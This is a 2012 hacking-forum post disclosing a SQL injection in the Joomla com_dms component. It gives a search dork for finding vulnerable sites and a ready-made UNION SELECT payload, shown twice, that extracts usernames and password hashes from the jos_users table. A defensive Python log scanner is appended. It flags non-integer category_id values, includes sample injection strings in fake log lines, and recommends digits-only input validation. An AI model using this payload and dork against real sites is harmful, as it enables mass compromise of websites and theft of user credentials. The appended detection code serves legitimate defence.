.:: Blackc0de Forum ::.

 Joomla Component com_dms Remote SQL injection vulnerability - (category_id)

Posted by 0day on Thu Jun 14, 2012 7:03 pm




[ Software Information ]



[+] Vendor : http://joomdonation.com/

[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40

[+] version : 2.5.1 or lower maybe also affected

[+] Vulnerability : SQL injection

[+] Dork : inurl:"com_dms"

[+] Type : commercial

===========================================================================



[ Vulnerable File ]



http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER]



[ Exploit ]



-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--



[ Demo ]



http://server/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users--

=========================================================================
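
For defenders reviewing web server logs for requests of the kind shown in the post above, the following is an added example and not part of the original post. It assumes combined-format access logs and that a legitimate `category_id` is always a plain non-negative integer; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Jun/2012:19:03:11 +0000] "GET /index.php?option=com_dms'
    '&task=view_category&category_id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [14/Jun/2012:19:04:02 +0000] "GET /index.php?option=com_dms'
    '&task=view_category&category_id=-1+union+all+select+1,2,3-- HTTP/1.1" 200 7344',
    '203.0.113.9 - - [14/Jun/2012:19:04:09 +0000] "GET /index.php?option=com_dms'
    '&task=view_category&category_id=5%20AND%201=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Jun/2012:19:05:40 +0000] "GET /index.php?option=com_content'
    '&view=article&id=41 HTTP/1.1" 200 9000',
]

# Client address and request target from one combined-format log line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"'
)
# Assumption: a legitimate category_id is digits only.
INTEGER_ID = re.compile(r"\d+")


def suspicious_dms_requests(lines):
    """Return (client_ip, decoded category_id) for com_dms requests whose
    category_id is not a plain integer after URL decoding."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        # parse_qs decodes both '+' and %xx, so encoded payloads are normalised.
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if "com_dms" not in query.get("option", []):
            continue  # other components are out of scope here
        for value in query.get("category_id", []):
            if not INTEGER_ID.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_dms_requests(SAMPLE_LOG):
        print(f"{ip}\tcategory_id={value!r}")
```

The same digits-only rule is what the component should enforce on `category_id` before the value reaches a query.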